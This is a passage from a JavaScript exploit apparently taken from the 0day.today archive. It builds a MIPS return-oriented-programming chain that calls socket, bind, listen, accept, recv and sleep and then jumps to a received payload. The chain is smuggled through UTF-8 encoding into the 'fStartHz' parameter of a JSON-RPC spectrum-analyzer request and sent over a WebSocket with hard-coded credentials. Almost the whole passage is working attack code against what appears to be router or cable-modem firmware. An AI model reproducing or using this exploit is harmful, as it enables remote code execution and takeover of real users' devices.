sp\r\nsp = previousSp+0x20\r\ninsertAt(arr, sp-1, socketAddrM4) //set s0 = socketAddr - 4\r\ninsertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])\r\n//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;\r\n\r\npreviousSp = sp\r\nsp = previousSp+0x80\r\ninsertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x3d, 0x5b, 0x30])\r\n//0x803d5b30: move $a0, $s0; move $v0, $zero; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;\r\n\r\npreviousSp = sp\r\nsp = previousSp+0x10\r\ninsertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd, 0x57, 0x6c])\r\n//0x800d576c: lw $a0, 4($a0); lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;\r\n\r\npreviousSp = sp\r\nsp = previousSp+0x10\r\ninsertAt(arr, sp+0x4-1, serverAddr) //set s1 = server\r\ninsertAt(arr, previousSp-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])\r\n//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;\r\n\r\npreviousSp = sp\r\nsp = previousSp+0x80\r\ninsertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x5d, 0xdf, 0xb8])\r\n//0x805ddfb8: move $a1, $s1; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;\r\n\r\npreviousSp = sp\r\nsp = previousSp + 0x10\r\ninsertAt(arr, previousSp-1, [0xe2, 0x80, 0x8a, 0x62, 0x4c])\r\ninsertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x7f, 0x18, 0x18])\r\n//0x807f1818: addiu $a2, $zero, 0x20; lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;\r\n\r\npreviousSp = sp\r\nsp = previousSp+0x10\r\ninsertAt(arr, previousSp-1, [0xf2, 0x80, 0x80, 0xa5, 0x40])\r\n//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; \r\n\r\npreviousSp = sp\r\nsp = previousSp+0x10\r\ninsertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x2e, 0x4f, 0x44])\r\n//0x802e4f44: addiu $v0, $v0, 0x77c8; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;\r\n\r\npreviousSp = sp\r\nsp = previousSp+0x10\r\ninsertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c])\r\n//0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;\r\n//call bind\r\n\r\npreviousSp = sp\r\nsp = previousSp+0x10\r\ninsertAt(arr, sp-1, socketAddrM4) //set s0 = socketAddr - 4\r\ninsertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])\r\n//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;\r\n\r\npreviousSp = sp\r\nsp = previousSp+0x80\r\ninsertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x3d, 0x5b, 0x30])\r\n//0x803d5b30: move $a0, $s0; move $v0, $zero; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;\r\n\r\npreviousSp = sp\r\nsp = previousSp+0x10\r\ninsertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd, 0x57, 0x6c])\r\n//0x800d576c: lw $a0, 4($a0); lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;\r\n\r\npreviousSp = sp\r\nsp = previousSp+0x10\r\ninsertAt(arr, previousSp-1, [0xc2, 0x80, 0x3a, 0x1b, 0x54]) \r\n//0x803a1b54: addiu $a1, $zero, 1; lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;\r\n\r\npreviousSp = sp\r\nsp = previousSp+0x10\r\ninsertAt(arr, sp-1, [0xf2, 0x80, 0x8a, 0x91, 0x20]) //set s0 = listen - 0x\r\ninsertAt(arr, previousSp-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])\r\n//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;\r\n\r\npreviousSp = sp\r\nsp = previousSp+0x80\r\ninsertAt(arr, previousSp+0x20-1, [0xf2, 0x80, 0x80, 0xa5, 0x40])\r\n//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; \r\n\r\npreviousSp = sp\r\nsp = previousSp+0x10\r\ninsertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x4c, 0x27, 0x78])\r\n//0x804c2778: addiu $v0, $v0, 0x4d90; lw $ra, 0x24($sp); lw $s0, 0x20($sp); jr $ra; addiu $sp, $sp, 0x30;\r\n\r\npreviousSp = sp\r\nsp = previousSp+0x30\r\ninsertAt(arr, previousSp+0x24-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c])\r\n//0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;\r\n//call listen\r\n\r\npreviousSp = sp\r\nsp = previousSp+0x10\r\ninsertAt(arr, sp-1, socketAddrM4) //set s0 = socketAddr - 4\r\ninsertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])\r\n//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;\r\n\r\npreviousSp = sp\r\nsp = previousSp+0x80\r\ninsertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x3d, 0x5b, 0x30])\r\n//0x803d5b30: move $a0, $s0; move $v0, $zero; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;\r\n\r\npreviousSp = sp\r\nsp = previousSp+0x10\r\ninsertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd, 0x57, 0x6c])\r\n//0x800d576c: lw $a0, 4($a0); lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;\r\n\r\npreviousSp = sp\r\nsp = previousSp+0x10\r\ninsertAt(arr, previousSp-1, [0xc2, 0x80, 0x8, 0x40, 0x8])\r\n//0x80084008: move $a1, $zero; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;\r\n\r\npreviousSp = sp\r\nsp = previousSp+0x10\r\ninsertAt(arr, sp-1, [0xe2, 0x80, 0x8a, 0xd8, 0x84]) //set s0 = accept\r\ninsertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x14, 0x27, 0x10])\r\n//0x80142710: move $a2, $zero; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;\r\n\r\npreviousSp = sp\r\nsp = previousSp+0x10\r\ninsertAt(arr, previousSp+0x8-1, [0xf2, 0x80, 0x80, 0xa5, 0x40])\r\n//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; \r\n\r\npreviousSp = sp\r\nsp = previousSp+0x10\r\ninsertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c])\r\n//0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;\r\n//call accept\r\n\r\n//0x80a05b24\r\nclientAddr = [0xe2, 0x80, 0xa0, 0x5b, 0x24]\r\n\r\npreviousSp = sp\r\nsp = previousSp+0x10\r\ninsertAt(arr, sp-1, clientAddr) //set s0 = clientAddr\r\ninsertAt(arr, sp+0x14-1, [0xc2, 0x80, 0x78, 0x7f, 0x64]) //set s5\r\ninsertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])\r\n//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;\r\n\r\npreviousSp = sp\r\nsp = previousSp+0x80\r\ninsertAt(arr, previousSp+0x20-1, [0xe2, 0x80, 0x8e, 0x2a, 0x20])\r\n//0x808e2a20: sw $v0, ($s0); move $v0, $s0; lw $ra, 0x14($sp); lw $s0, 0x10($sp); jr $ra; addiu $sp, $sp, 0x20;\r\n\r\n\r\n// previousSp = sp\r\n// sp = previousSp+0x20\r\n// insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0x78, 0x7f, 0x64])\r\n// //0x80787f64: jalr $s5; nop;\r\n\r\nclientAddrM4 = [0xe2, 0x80, 0xa0, 0x5b, 0x20]\r\n\r\npreviousSp = sp\r\nsp = previousSp+0x20\r\ninsertAt(arr, sp-1, clientAddrM4) //set s0 = clientAddr - 4\r\ninsertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])\r\n//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;\r\n\r\npreviousSp = sp\r\nsp = previousSp+0x80\r\ninsertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x3d, 0x5b, 0x30])\r\n//0x803d5b30: move $a0, $s0; move $v0, $zero; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;\r\n\r\npreviousSp = sp\r\nsp = previousSp+0x10\r\ninsertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd, 0x57, 0x6c])\r\n//0x800d576c: lw $a0, 4($a0); lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;\r\n\r\npreviousSp = sp\r\nsp = previousSp+0x10\r\ninsertAt(arr, previousSp-1, [0xc2, 0x80, 0x4c, 0x10, 0x38])\r\n//0x804c1038: addiu $a2, $zero, 0x400; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;\r\n\r\n//0x80a05c30\r\npayloadAddr = [0xe2, 0x80, 0xa0, 0x5c, 0x30]\r\n\r\npreviousSp = sp\r\nsp = previousSp+0x10\r\ninsertAt(arr, sp+0x4-1, payloadAddr) //set s1 = payload\r\ninsertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])\r\n//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;\r\n\r\npreviousSp = sp\r\nsp = previousSp+0x80\r\ninsertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x5d, 0xdf, 0xb8])\r\n//0x805ddfb8: move $a1, $s1; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;\r\n\r\npreviousSp = sp\r\nsp = previousSp+0x10\r\ninsertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x46, 0x73, 0x68])\r\n//0x80467368: move $a3, $zero; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;\r\n\r\npreviousSp = sp\r\nsp = previousSp+0x10\r\ninsertAt(arr, sp-1, [0xf2, 0x80, 0x8a, 0x93, 0x3c]) //set s0 = recv - 0x\r\ninsertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])\r\n//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;\r\n\r\npreviousSp = sp\r\nsp = previousSp+0x80\r\ninsertAt(arr, previousSp+0x20-1, [0xf2, 0x80, 0x80, 0xa5, 0x40])\r\n//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; \r\n\r\npreviousSp = sp\r\nsp = previousSp+0x10\r\ninsertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x4c, 0x27, 0x78])\r\n//0x804c2778: addiu $v0, $v0, 0x4d90; lw $ra, 0x24($sp); lw $s0, 0x20($sp); jr $ra; addiu $sp, $sp, 0x30;\r\n\r\npreviousSp = sp\r\nsp = previousSp+0x30\r\ninsertAt(arr, previousSp+0x24-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c])\r\n//0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;\r\n//call recv\r\n\r\npreviousSp = sp\r\nsp = previousSp+0x10\r\ninsertAt(arr, previousSp+0x4-1, [0xf2, 0x80, 0x80, 0xa8, 0x64]) \r\n// 0x8080a864: addiu $a0, $zero, 2; lw $ra, 0x14($sp); lw $s0, 0x10($sp); move $v0, $zero; jr $ra; addiu $sp, $sp, 0x20;\r\n\r\npreviousSp = sp\r\nsp = previousSp+0x20\r\ninsertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0x12, 0x3b, 0x7c])\r\n//0x80123b7c: addiu $a0, $a0, 4; lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;\r\n\r\npreviousSp = sp\r\nsp = previousSp+0x10\r\ninsertAt(arr, sp-1, [0xf2, 0x80, 0x8a, 0xab, 0x5c]) //set s0 = sleep\r\ninsertAt(arr, previousSp-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])\r\n//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;\r\n\r\npreviousSp = sp\r\nsp = previousSp+0x80\r\ninsertAt(arr, previousSp+0x20-1, [0xf2, 0x80, 0x80, 0xa5, 0x40])\r\n//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; \r\n\r\npreviousSp = sp\r\nsp = previousSp+0x10\r\ninsertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c])\r\n//0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;\r\n//call sleep\r\n\r\npreviousSp = sp\r\nsp = previousSp+0x10\r\ninsertAt(arr, sp-1, payloadAddr) //set s0 = payload\r\ninsertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])\r\n//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;\r\n\r\npreviousSp = sp\r\nsp = previousSp+0x80\r\ninsertAt(arr, previousSp+0x20-1, [0xf2, 0x80, 0x80, 0xa5, 0x40])\r\n//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; \r\n\r\npreviousSp = sp\r\nsp = previousSp+0x10\r\ninsertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c])\r\n//0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;\r\n\r\nvar string = new TextDecoder(\"utf-8\").decode(arr);\r\n\r\nvar newArr = new TextEncoder(\"utf-8\").encode(string);\r\n\r\nconsole.log(buf2hex(newArr));\r\n\r\nexploit = '{\"jsonrpc\":\"2.0\",\"method\":\"Frontend::GetFrontendSpectrumData\",\"params\":{\"coreID\":0,\"fStartHz\":' + string + ',\"fStopHz\":1000000000,\"fftSize\":1024,\"gain\":1},\"id\":\"0\"}'\r\nconsole.log(exploit)\r\n\r\nconsole.log(testEqual(arr, newArr));\r\n\r\nvar socket = new WebSocket(\"ws://spectrum:[email\u00a0protected]:6080/Frontend\", 'rpc-frontend')\r\n\r\nsocket.onopen = function(e) {\r\n socket.send(exploit)\r\n fetch('/payload')\r\n};\n\n# 0day.today [2020-01-19] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/33818"}]}